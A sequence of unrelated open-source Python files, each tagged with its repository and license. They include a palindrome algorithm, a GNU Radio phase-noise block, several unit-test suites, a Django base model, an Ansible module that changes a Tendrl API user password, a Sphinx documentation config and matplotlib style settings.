                    "volume detachment",
                    instance.id, volume.id)
        self.verify(120, self._wait_for_volume_status, 10,
                    'Volume status did not become "available".',
                    "volume becoming 'available'",
                    volume, 'available')
        self.verify(50, self.volume_client.volumes.delete, 11,
                    'Can not delete volume. ',
                    "volume deletion",
                    volume)
        self.verify(50, self.verify_volume_deletion, 12,
                    'Can not delete volume. ',
                    "volume deletion",
                    volume)
        self.verify(30, self._delete_server, 13,
                    "Can not delete server. ",
                    "server deletion",
                    instance)
| eayunstack/fuel-ostf | fuel_health/tests/smoke/test_vcenter.py | Python | apache-2.0 | 20,161 |
"""
问题描述:给定一个字符串str1,只能往str1的后面添加字符变成str2,要求str2
整体都是回文串且最短。
举例:
str1 = ABC12321,则返回ABC12321CBA
"""
import sys
class ShortestEnd:
    """Compute the shortest right-extension of a string into a palindrome."""

    @classmethod
    def get_shortest_end_by_manacher(cls, str1):
        """Return ``str1`` plus the fewest characters making it a palindrome.

        Manacher's algorithm finds the longest palindromic *suffix* of
        ``str1``; the characters before that suffix, reversed, are the
        minimal text to append.
        """
        if not str1:
            return ''
        expanded = cls.get_manacher_str(str1)
        size = len(expanded)
        radius = [0] * size          # palindrome radii in the '#'-string
        mid, bound = -1, -1          # center / right edge of furthest palindrome
        suffix_len = -sys.maxsize
        for pos in range(size):
            # Seed from the mirror position when inside the known bound.
            radius[pos] = 1 if pos > bound else min(radius[2 * mid - pos],
                                                    bound - pos)
            # Expand around pos as far as the string allows.
            while pos - radius[pos] > -1 and pos + radius[pos] < size:
                if expanded[pos + radius[pos]] != expanded[pos - radius[pos]]:
                    break
                radius[pos] += 1
            if pos + radius[pos] > bound:
                bound = pos + radius[pos]
                mid = pos
                if bound == size:
                    # Palindrome touches the right edge: its radius encodes
                    # the longest palindromic suffix of the original string.
                    suffix_len = radius[pos]
                    break
        # Append the reversed non-palindromic prefix.
        return str1 + str1[:len(str1) + 1 - suffix_len][::-1]

    @classmethod
    def get_manacher_str(cls, str1):
        """Interleave '#' separators: 'ab' -> '#a#b#'."""
        return '#' + ''.join('{}#'.format(ch) for ch in str1)
if __name__ == '__main__':
    # Demo: the shortest palindromic extension of 'abcd12321' is
    # 'abcd12321dcba'.
    my_str = 'abcd12321'
    print(ShortestEnd.get_shortest_end_by_manacher(my_str))
#!/usr/bin/env python
##################################################
# Gnuradio Python Flow Graph
# Title: Phase Noise Generator
# Author: mettus
# Generated: Thu Aug 1 11:59:39 2013
##################################################
from gnuradio import analog
from gnuradio import blocks
from gnuradio import filter
from gnuradio import gr
from gnuradio.filter import firdes
class phase_noise_gen(gr.hier_block2):
    """Hierarchical GNU Radio block that applies phase noise to a stream.

    Gaussian noise of amplitude ``noise_mag`` is smoothed by a single-pole
    IIR filter (coefficient ``alpha``) and used as an instantaneous phase:
    cos/sin of the filtered noise build a unit phasor that is multiplied
    onto the complex input signal.
    """
    def __init__(self, noise_mag=0, alpha=0.1):
        # One complex input stream, one complex output stream.
        gr.hier_block2.__init__(
            self, "Phase Noise Generator",
            gr.io_signature(1, 1, gr.sizeof_gr_complex * 1),
            gr.io_signature(1, 1, gr.sizeof_gr_complex * 1),
        )
        ##################################################
        # Parameters
        ##################################################
        self.noise_mag = noise_mag
        self.alpha = alpha
        ##################################################
        # Blocks
        ##################################################
        self.filter_single_pole_iir_filter_xx_0 = filter.single_pole_iir_filter_ff(
            alpha, 1)
        self.blocks_transcendental_0_0 = blocks.transcendental("sin", "float")
        self.blocks_transcendental_0 = blocks.transcendental("cos", "float")
        self.blocks_multiply_xx_0 = blocks.multiply_vcc(1)
        self.blocks_float_to_complex_0 = blocks.float_to_complex(1)
        # Fixed seed (42) keeps runs reproducible.
        self.analog_noise_source_x_0 = analog.noise_source_f(
            analog.GR_GAUSSIAN, noise_mag, 42)
        ##################################################
        # Connections
        ##################################################
        # noise -> IIR -> cos/sin -> (re, im) phasor; phasor * input -> out.
        self.connect((self.blocks_float_to_complex_0, 0),
                     (self.blocks_multiply_xx_0, 1))
        self.connect((self.analog_noise_source_x_0, 0),
                     (self.filter_single_pole_iir_filter_xx_0, 0))
        self.connect((self.blocks_multiply_xx_0, 0), (self, 0))
        self.connect((self, 0), (self.blocks_multiply_xx_0, 0))
        self.connect((self.filter_single_pole_iir_filter_xx_0, 0),
                     (self.blocks_transcendental_0, 0))
        self.connect((self.filter_single_pole_iir_filter_xx_0, 0),
                     (self.blocks_transcendental_0_0, 0))
        self.connect((self.blocks_transcendental_0, 0),
                     (self.blocks_float_to_complex_0, 0))
        self.connect((self.blocks_transcendental_0_0, 0),
                     (self.blocks_float_to_complex_0, 1))
    def get_noise_mag(self):
        """Return the current noise amplitude."""
        return self.noise_mag
    def set_noise_mag(self, noise_mag):
        """Update the noise amplitude on the running noise source."""
        self.noise_mag = noise_mag
        self.analog_noise_source_x_0.set_amplitude(self.noise_mag)
    def get_alpha(self):
        """Return the current IIR smoothing coefficient."""
        return self.alpha
    def set_alpha(self, alpha):
        """Update the IIR smoothing coefficient on the running filter."""
        self.alpha = alpha
        self.filter_single_pole_iir_filter_xx_0.set_taps(self.alpha)
| dl1ksv/gnuradio | gr-channels/python/channels/phase_noise_gen.py | Python | gpl-3.0 | 2,882 |
#-*-coding:utf-8-*-
"""
@package fsmonitor.tests.test_base
@brief tests for dropbox.base
@author Sebastian Thiel
@copyright [GNU Lesser General Public License](https://www.gnu.org/licenses/lgpl.html)
"""
__all__ = []
import os
from time import time
from fsmonitor.base import *
from fsmonitor.tree import *
from fsmonitor.finder import *
from . import DropboxTestCase
from bkvstore import KeyValueStoreModifier
class TestPackageDiffer(PackageDiffer):
    """PackageDiffer subclass that counts how often each diff callback fires."""
    __slots__ = ('added_seen', 'removed_seen', 'changed_seen', 'unchanged_seen')
    def __init__(self):
        self.added_seen = self.removed_seen = self.changed_seen = self.unchanged_seen = 0
    def _handle_added_package(self, rhs_package):
        self.added_seen += 1
    def _handle_removed_package(self, lhs_package):
        self.removed_seen += 1
    def _handle_possibly_changed_package(self, lhs_package, rhs_package, modified):
        super(TestPackageDiffer, self)._handle_possibly_changed_package(lhs_package, rhs_package, modified)
        # Compare against the exact booleans so only genuine True/False
        # values are counted (`+=` adds 1 for a match, 0 otherwise).
        self.changed_seen += modified == True
        self.unchanged_seen += modified == False
# end class TestPackageDiffer
class BaseDropboxTestCase(DropboxTestCase):
    """Exercises DropboxFinder, Dropbox and TreeRoot against the fixtures."""
    __slots__ = ()
    # Fixture sub-paths shared by the tests below.
    tree_a = 'tree/a'
    tree_b = 'tree/b'
    def test_finder(self):
        """Test for the dropbox finder implementation"""
        df = DropboxFinder(paths=[self.fixture_path('')], config_file_glob='dropbox.yaml')
        assert len(df.dropboxes) == 0
        assert len(list(df.iter_dropboxes())) == 0
        assert len(df.update(known_only=True).dropboxes) == 0, "there is nothing to update yet"
        assert len(df.update(known_only=False).dropboxes) == 0, "now it should have found nothing, search depth not high enough"
        df.max_depth = 2
        assert len(df.update().dropboxes) == 1, "search depth should now be sufficient"
        # Just update again to trigger some code - for now we trust it's capability to detect changes
        # and obey it's arguments
        for known in range(2):
            assert len(df.update(known_only=known).dropboxes) == 1
        # end for each known item
        assert len(list(df.iter_dropboxes())) == 1, "should be same result"
        # NOTE: ``.next()`` is Python 2 iterator syntax.
        db = df.iter_dropboxes().next()
        for pkg in db.iter_packages():
            assert df.dropbox_by_contained_path(pkg.root()) is db
        # end for each package
    def test_dropbox(self):
        """Test basic dropbox type"""
        config = KeyValueStoreModifier(dict(package=dict(search_paths=[str(self.fixture_path(self.tree_a)),
                                                                       str(self.fixture_path(self.tree_b))])))
        db = Dropbox(config)
        assert len(db.trees()) == 2
        # can't clear cache without config path
        self.failUnlessRaises(AssertionError, db.clear_configuration_cache)
        assert db.clear_configuration_cache(configuration=config) is db
        # test package diff - there may be no change
        tpd = TestPackageDiffer()
        assert len(db.diff_tree_sample_packages(tpd)) == 9
        assert tpd.added_seen == tpd.removed_seen == tpd.changed_seen == 0
        assert tpd.unchanged_seen == 9
        dp = Dropbox(self.fixture_path('tree/dropbox.yaml'))
        assert len(dp.trees()) == 2, "initialized from a file, the result should be the same"
    def test_tree(self):
        """Test the tree type's basic functionality"""
        tree = TreeRoot(self.fixture_path(self.tree_a))
        assert tree.root_path() is not None
        assert tree.sample_time() is not None
        assert len(tree) == 4
        assert not isinstance(tree['file.ext'], dict), "should obtain file"
        assert isinstance(tree['dir_full'], dict), "should have gotten dict"
        assert not isinstance(tree['dir_full/file.ext'], dict), "should have gotten file"
        assert not isinstance(tree['first_level_empty/subdir/package_dir/empty.file'], dict), 'should have gotten file'
        packs = sorted(tree.iter_packages())
        assert len(packs) == 5, "Should have exactly 4 packages"
        rela_packs = ['7.3.\xc2\xa0package-cleanup.html', 'dir_full', 'file.ext', 'first_level_empty/package_dir', 'first_level_empty/subdir/package_dir']
        assert [p.root_relative() for p in packs] == rela_packs, "didn't get expected packages"
        # Test testing for changes and affected packages
        tree2 = TreeRoot(self.fixture_path('tree/a'))
        assert tree2 == tree, "tree comparison should work"
        packs2 = sorted(tree2.iter_packages())
        pid = 2
        assert packs2[pid].set_stable_since(time()) is packs2[pid]
        assert packs2[pid] == packs[pid], "Package comparison should work"
        # change contents of file, and comparison should change
        assert packs2[pid].root().isfile()
        tree2[packs2[pid].root_relative()] = os.stat('.')
        assert packs2[pid] != packs[pid]
        assert packs[1].root().isdir() and packs[0] != packs[pid], "Should be able to compare file and directory packages"
        assert len(packs[1].entries())
        assert packs[pid].set_tree(tree2) is packs[pid], "tree can be changed to anything compatible"
        # set it back ... for diffing later
        assert packs[pid].set_tree(tree) is packs[pid], "tree can be changed to anything compatible"
        # prepare tree for diff
        #######################
        # Add fake package
        packs2.append(Package(tree2, 'first_level_empty'))
        # remove package
        del packs2[0]
        tpd = TestPackageDiffer()
        rhspacks = tpd.diff(packs, packs2)
        assert tpd.added_seen == tpd.removed_seen == tpd.changed_seen == 1
        assert tpd.unchanged_seen == 3
        assert len(packs) == 5
        tpd = TestPackageDiffer()
        assert tpd.diff(list(), packs)
        assert tpd.added_seen == 5
        # Entries
        c = 0
        for name in tree:
            c += 1
            assert len(tree.entries(name))
        # end for each name
        assert c
| Byron/bit | src/python/fsmonitor/tests/test_base.py | Python | lgpl-3.0 | 6,032 |
from django.db import models
from cinemania.utils import slugify
__all__ = ['BaseModel']
class BaseModel(models.Model):
    """Abstract base model: a unique title plus a title-derived slug primary key."""
    # Title field
    title = models.CharField(unique=True, max_length=64)
    # Slug field (primary key, generated from ``title`` on save)
    slug = models.SlugField(primary_key=True, max_length=64)
    class Meta:
        app_label = 'cinemania'
        abstract = True
    def __cmp__(self, other):
        # NOTE: ``__cmp__``/``cmp`` are Python 2 only; under Python 3 this
        # method is ignored and ``cmp`` does not exist.
        return cmp(self.slug, other.slug)
    def __unicode__(self):
        return self.title
    def save(self, force_update=False, force_insert=False):
        # Create slug from title field
        # NOTE(review): the slug — the primary key — is regenerated on every
        # save, so a title change effectively changes the row's identity;
        # confirm this is intended.
        self.slug = slugify(self.title, instance=self)
        super(BaseModel, self).save(force_update=force_update, force_insert=force_insert)
| bashu/cinemania | cinemania/models/base.py | Python | gpl-3.0 | 744 |
#!/usr/bin/python
'''
See DOCUMENTATION constant.
'''
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
module: tendrl_user
short_description: Changes 'usm_username' user password to _password_from_module_argument_
via Tendrl API.
description:
- Module reads from confile(module argument 'conf_path') 'usm_username',
'usm_password' and 'usm_api_url'.
- There must be installed tendrl-api on the machine where this is ran.
version_added: "1.0"
author:
- "fbalak@redhat.com"
- "mkudlej@redhat.com"
'''
EXAMPLES = '''
ansible -i _inventory_ -m tendrl_user -a "conf_path='_usm.yaml.path_'" localhost
'''
import json
import yaml
import requests
from ansible.module_utils.basic import AnsibleModule
# Ansible entry point, created at import time so the helper functions below
# can report errors via MODULE.fail_json().
MODULE = AnsibleModule(
    argument_spec=dict(
        conf_path=dict(required=True, type='str'),
        new_password=dict(required=True, type='str')
    )
)
def login(api_url, username, password):
    """Authenticate against the Tendrl API and return the parsed JSON reply.

    On a non-200 response the Ansible module fails (which exits), so this
    function only returns on success.
    """
    credentials = {"username": username, "password": password}
    reply = requests.post(
        "{}login".format(api_url),
        data=json.dumps(credentials))
    if reply.status_code != requests.codes["ok"]:
        details = {"url": reply.url, "data": credentials}
        MODULE.fail_json(
            msg="Could not login with these credentials.",
            meta=details)
    return reply.json()
def change_password(api_url, username, password, token):
    """Change the user's password and set its email to username@hostname.

    Issues an authenticated PUT to the Tendrl users endpoint; a non-200
    response fails the Ansible module (which exits).
    """
    payload = {
        "username": username,
        "password": password,
        "password_confirmation": password,
        "email": "{}@{}".format(username, 'localhost.localdomain')}
    reply = requests.put(
        "{}users/{}".format(api_url, username),
        data=json.dumps(payload),
        headers={"Authorization": "Bearer {}".format(token)})
    if reply.status_code != requests.codes["ok"]:
        details = {"url": reply.url, "data": payload, "token": token, "text": reply.text}
        MODULE.fail_json(msg="Request to server failed.", meta=details)
    return reply.json()
def main():
    """Change the Tendrl user's password and persist it in the config file.

    Reads ``username``, ``password`` and ``api_url`` from the given config
    file(s), logs in with the current credentials, changes the password via
    the API, and writes the new password back into the file it came from.
    """
    conf_paths = MODULE.params['conf_path'].split(' ')
    new_password = MODULE.params['new_password']
    username = password = api_url = None
    pass_conf = None
    data = None
    for c in conf_paths:
        with open(c, "r") as stream:
            try:
                # NOTE: yaml.load without an explicit Loader is unsafe on
                # untrusted input; these are local test configs.
                conf = yaml.load(stream)
            except yaml.YAMLError as exc:
                print(exc)
                # Previously execution continued with an undefined ``conf``
                # (NameError); skip unparsable files instead.
                continue
        usmqe = conf.get('usmqe', {}) if conf else {}
        if 'username' in usmqe:
            username = usmqe['username']
        if 'password' in usmqe:
            password = usmqe['password']
            # Remember which file (and parsed content) holds the password so
            # the update below is written back to the right place.  The old
            # code re-read the already-consumed/closed stream here, so
            # ``data`` was never valid.
            pass_conf = c
            data = conf
        if 'api_url' in usmqe:
            api_url = usmqe['api_url']
    assert username is not None
    assert password is not None
    assert api_url is not None
    token = login(api_url, username, password)["access_token"]
    if password == new_password:
        MODULE.exit_json(changed=False)
    result = change_password(api_url, username, new_password, token)
    response = {"result": result}
    data["usmqe"]["password"] = new_password
    with open(pass_conf, "w") as f:
        yaml.dump(data, f)
    MODULE.exit_json(changed=True, meta=response)
| usmqe/usmqe-setup | library/tendrl_user.py | Python | apache-2.0 | 3,557 |
#!/usr/bin/env python
# Copyright (c) 2017-2021 F5 Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
from f5_cccl.resource.ltm.pool_member import ApiPoolMember
from f5_cccl.resource.ltm.pool_member import PoolMember
from mock import MagicMock
# import pdb
import pytest
@pytest.fixture
def members():
    """Return the pool-member config variants exercised by the tests below."""
    members = {
        # Bare minimum: address + port.
        'member_min_config': {
            'address': "172.16.200.100",
            'port': 80
        },
        # Address carries an explicit (default) route domain.
        'member_w_route_domain': {
            'address': "172.16.200.101%0",
            'port': 80,
        },
        # Invalid: missing required 'port'.
        'member_no_port': {
            'address': "172.16.200.102",
        },
        # Invalid: missing required 'address'.
        'member_no_address': {
            'port': 80,
        },
        # Non-default route domain (%2).
        'member_w_nonzero_route_domain': {
            'address': "172.16.200.103%2",
            'port': 80,
        },
        # IPv6 variants, with and without a route domain.
        'member_min_ipv6_config': {
            'address': "2001:0db8:3c4d:0015:0000:0000:abcd:ef12",
            'port': 80
        },
        'member_min_ipv6_rd_config': {
            'address': "2001:0db8:3c4d:0015:0000:0000:abcd:ef12%2",
            'port': 80,
        }
    }
    return members
@pytest.fixture
def bigip():
    """Fixture that returns BIG-IP."""
    # A plain mock suffices; no test here talks to a real device.
    bigip = MagicMock()
    return bigip
@pytest.fixture
def pool():
    """Fixture that returns a Pool object."""
    return MagicMock()
# Expected key set of every pool-member payload, shared by all tests below.
POOL_PROPERTIES = PoolMember.properties
def test_create_cccl_member_min_config(pool, members):
    """Test creation of ApiPoolMember from bare config."""
    cfg_name = "member_min_config"
    partition = "Common"
    # pdb.set_trace()
    member = ApiPoolMember(
        partition=partition,
        default_route_domain=0,
        pool=pool,
        **members[cfg_name]
    )
    assert member
    # Test data
    assert member.data
    pool_data = copy.copy(member.data)
    # Walk every expected property, verify its value, and pop it so any
    # unexpected leftover keys are caught by the final assertion.
    for k, _ in list(POOL_PROPERTIES.items()):
        if k == 'name':
            # Default route domain 0 is made explicit in the name.
            assert pool_data['name'] == "172.16.200.100%0:80"
        elif k == 'partition':
            assert pool_data['partition'] == "Common"
        elif k == 'ratio':
            assert pool_data['ratio'] == 1
        elif k == 'connectionLimit':
            assert pool_data['connectionLimit'] == 0
        elif k == 'priorityGroup':
            assert pool_data['priorityGroup'] == 0
        elif k == 'session':
            assert pool_data['session'] == "user-enabled"
        elif k == 'description':
            assert not pool_data['description']
        pool_data.pop(k)
    assert not pool_data, "unexpected keys found in data"
def test_create_cccl_member_w_route_domain(pool, members):
    """Test creation of ApiPoolMember from bare config w route domain."""
    cfg_name = "member_w_route_domain"
    partition = "Common"
    member = ApiPoolMember(
        partition=partition,
        default_route_domain=0,
        pool=pool,
        **members[cfg_name]
    )
    assert member
    # Test data
    assert member.data
    pool_data = copy.copy(member.data)
    # Verify and pop each expected key; leftovers fail the final assertion.
    for k, _ in list(POOL_PROPERTIES.items()):
        if k == 'name':
            # Explicit %0 route domain is preserved in the name.
            assert pool_data['name'] == "172.16.200.101%0:80"
        elif k == 'partition':
            assert pool_data['partition'] == "Common"
        elif k == 'ratio':
            assert pool_data['ratio'] == 1
        elif k == 'connectionLimit':
            assert pool_data['connectionLimit'] == 0
        elif k == 'priorityGroup':
            assert pool_data['priorityGroup'] == 0
        elif k == 'session':
            assert pool_data['session'] == "user-enabled"
        elif k == 'description':
            assert not pool_data['description']
        pool_data.pop(k)
    assert not pool_data, "unexpected keys found in data"
def test_create_cccl_member_no_port(pool, members):
    """Verify ApiPoolMember creation fails when 'port' is missing.

    The constructor must raise TypeError; nothing after the raising call
    executes inside a ``pytest.raises`` block, so the previous trailing
    ``assert not member`` was unreachable dead code and has been removed.
    """
    cfg_name = "member_no_port"
    partition = "Common"
    with pytest.raises(TypeError):
        ApiPoolMember(
            partition=partition,
            default_route_domain=0,
            pool=pool,
            **members[cfg_name]
        )
def test_create_cccl_member_no_address(pool, members):
    """Verify ApiPoolMember creation fails when 'address' is missing.

    The constructor must raise TypeError; nothing after the raising call
    executes inside a ``pytest.raises`` block, so the previous trailing
    ``assert not member`` was unreachable dead code and has been removed.
    """
    cfg_name = "member_no_address"
    partition = "Common"
    with pytest.raises(TypeError):
        ApiPoolMember(
            partition=partition,
            default_route_domain=0,
            pool=pool,
            **members[cfg_name]
        )
def test_create_cccl_member_w_nonzero_route_domain(pool, members):
    """Test of ApiPoolMember create with non-zero route-domain."""
    cfg_name = "member_w_nonzero_route_domain"
    partition = "Common"
    member = ApiPoolMember(
        partition=partition,
        default_route_domain=0,
        pool=pool,
        **members[cfg_name]
    )
    assert member
    # Test data
    assert member.data
    pool_data = copy.copy(member.data)
    # Verify and pop each expected key; leftovers fail the final assertion.
    for k, _ in list(POOL_PROPERTIES.items()):
        if k == 'name':
            # The non-default %2 route domain overrides the default of 0.
            assert pool_data['name'] == "172.16.200.103%2:80"
        elif k == 'partition':
            assert pool_data['partition'] == "Common"
        elif k == 'ratio':
            assert pool_data['ratio'] == 1
        elif k == 'connectionLimit':
            assert pool_data['connectionLimit'] == 0
        elif k == 'priorityGroup':
            assert pool_data['priorityGroup'] == 0
        elif k == 'session':
            assert pool_data['session'] == "user-enabled"
        elif k == 'description':
            assert not pool_data['description']
        pool_data.pop(k)
    assert not pool_data, "unexpected keys found in data"
def test_create_cccl_member_min_ipv6_config(pool, members):
    """Test of ApiPoolMember create with IPv6 address."""
    cfg_name = "member_min_ipv6_config"
    partition = "Common"
    # pdb.set_trace()
    member = ApiPoolMember(
        partition=partition,
        default_route_domain=0,
        pool=pool,
        **members[cfg_name]
    )
    assert member
    # Test data
    assert member.data
    pool_data = copy.copy(member.data)
    # Verify and pop each expected key; leftovers fail the final assertion.
    for k, _ in list(POOL_PROPERTIES.items()):
        if k == 'name':
            # IPv6 names use '.' (not ':') between address and port.
            assert (pool_data['name'] ==
                    "2001:0db8:3c4d:0015:0000:0000:abcd:ef12%0.80")
        elif k == 'partition':
            assert pool_data['partition'] == "Common"
        elif k == 'ratio':
            assert pool_data['ratio'] == 1
        elif k == 'connectionLimit':
            assert pool_data['connectionLimit'] == 0
        elif k == 'priorityGroup':
            assert pool_data['priorityGroup'] == 0
        elif k == 'session':
            assert pool_data['session'] == "user-enabled"
        elif k == 'description':
            assert not pool_data['description']
        pool_data.pop(k)
    assert not pool_data, "unexpected keys found in data"
def test_create_cccl_member_min_ipv6_rd_config(pool, members):
    """Create an ApiPoolMember from an IPv6 config with a route domain."""
    member = ApiPoolMember(
        partition="Common",
        default_route_domain=0,
        pool=pool,
        **members["member_min_ipv6_rd_config"]
    )
    assert member

    # The config's route domain (2) must appear in the generated name.
    assert member.data
    remaining = copy.copy(member.data)
    expected = {
        'name': "2001:0db8:3c4d:0015:0000:0000:abcd:ef12%2.80",
        'partition': "Common",
        'ratio': 1,
        'connectionLimit': 0,
        'priorityGroup': 0,
        'session': "user-enabled",
    }
    for key, _ in list(POOL_PROPERTIES.items()):
        if key == 'description':
            assert not remaining['description']
        elif key in expected:
            assert remaining[key] == expected[key]
        remaining.pop(key)
    assert not remaining, "unexpected keys found in data"
| f5devcentral/f5-cccl | f5_cccl/resource/ltm/test/test_api_pool_member.py | Python | apache-2.0 | 8,616 |
# -*- coding: utf-8 -*-
#
# dh-virtualenv documentation build configuration file, created by
# sphinx-quickstart on Wed Feb 20 17:29:43 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import re
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(".."))

# Project metadata is read from the repository's setup.py, which exposes a
# mapping named ``project`` (used below via meta["name"] / meta["version"]).
from setup import project as meta

# Read the Docs sets READTHEDOCS=True in its build environment. The RTD theme
# is only imported for local builds because RTD provides it automatically.
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd:
    import sphinx_rtd_theme
# https://docs.readthedocs.io/en/latest/guides/adding-custom-css.html
def setup(app):
app.add_css_file('css/custom.css')
#app.add_javascript('js/custom.js')
# -- General configuration -----------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
# napoleon parses Google-style docstrings (see napoleon_numpy_docstring below).
extensions = [
    'sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.coverage',
    'sphinx.ext.ifconfig', 'sphinx.ext.viewcode', 'sphinx.ext.napoleon',
]

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix of source filenames.
source_suffix = '.rst'

# The encoding of source files.
#source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'index'
# General information about the project.
project = meta["name"]
copyright = u'2013-2018 Spotify AB and contributors'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.

# The full version, including alpha/beta/rc tags.
release = meta["version"]
# The short X.Y version: the first two numeric components of the release.
# The pattern is a raw string: a plain "[^\d]+" relies on the invalid escape
# sequence "\d", which raises a DeprecationWarning on Python 3.6+ (and a
# SyntaxWarning on newer versions).
version = '.'.join(re.split(r"[^\d]+", release)[:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%Y-%m-%d'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = [
    '*~',
    '_build',
    'LICENSE.rst',
    'README.rst',
    'modules.rst',
    'dh_virtualenv.1.rst',
    'api/modules.rst',
]

# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []

# Napoleon settings: docstrings are Google-style, not NumPy-style.
napoleon_numpy_docstring = False

# -- Options for HTML output ---------------------------------------------------

# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes. 'default' is only the on-RTD fallback; local
# builds switch to the RTD theme just below.
html_theme = 'default'
if not on_rtd:
    # The theme to use for HTML and HTML Help pages. See the documentation for
    # a list of builtin themes.
    html_theme = 'sphinx_rtd_theme'
    # Add any paths that contain custom themes here, relative to this directory.
    html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]

# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []

# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None

# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
##html_logo = '_static/img/logo-180px.png'

# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%Y-%m-%d'

# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
html_use_smartypants = True

# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}

# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}

# If false, no module index is generated.
#html_domain_indices = True

# If false, no index is generated.
html_use_index = True

# If true, the index is split into individual pages for each letter.
#html_split_index = False

# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True

# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''

# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None

# Output file base name for HTML help builder.
htmlhelp_basename = 'dh-virtualenvdoc'

# -- Options for LaTeX output --------------------------------------------------

latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
    ('index', 'dh-virtualenv.tex', u'dh-virtualenv Documentation',
     u'Spotify AB', 'manual'),
]

# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None

# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False

# If true, show page references after internal links.
#latex_show_pagerefs = False

# If true, show URL addresses after external links.
#latex_show_urls = False

# Documents to append as an appendix to all manuals.
#latex_appendices = []

# If false, no module index is generated.
#latex_domain_indices = True

# -- Options for manual page output --------------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'dh-virtualenv', u'dh-virtualenv Documentation',
     [u'Spotify AB'], 1)
]

# If true, show URL addresses after external links.
#man_show_urls = False

# -- Options for Texinfo output ------------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    ('index', 'dh-virtualenv', u'dh-virtualenv Documentation',
     u'Spotify AB', 'dh-virtualenv',
     'Debian packaging sequence for Python virtualenvs.',
     'Miscellaneous'),
]

# Documents to append as an appendix to all manuals.
#texinfo_appendices = []

# If false, no module index is generated.
#texinfo_domain_indices = True

# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| spotify/dh-virtualenv | doc/conf.py | Python | gpl-2.0 | 8,829 |
# -*- coding: utf-8 -*-
"""
@author: Ana Andres-Arroyo
Matplotlib settings for Surface Pro 4
"""
import matplotlib

# All rcParams overrides collected in one mapping and applied with a single
# update() call; the resulting configuration is identical to updating each
# key individually. Disabled tweaks are kept as comments for reference.
_RC_OVERRIDES = {
    # 'font.size': 30,
    'lines.linewidth': 5,
    'axes.grid': True,
    'axes.linewidth': 2,
    'axes.axisbelow': True,
    'axes.labelpad': 3,
    # 'axes.titlepad': 25,
    'xtick.major.size': 15,
    'ytick.major.size': 15,
    'xtick.major.pad': 10,
    'ytick.major.pad': 10,
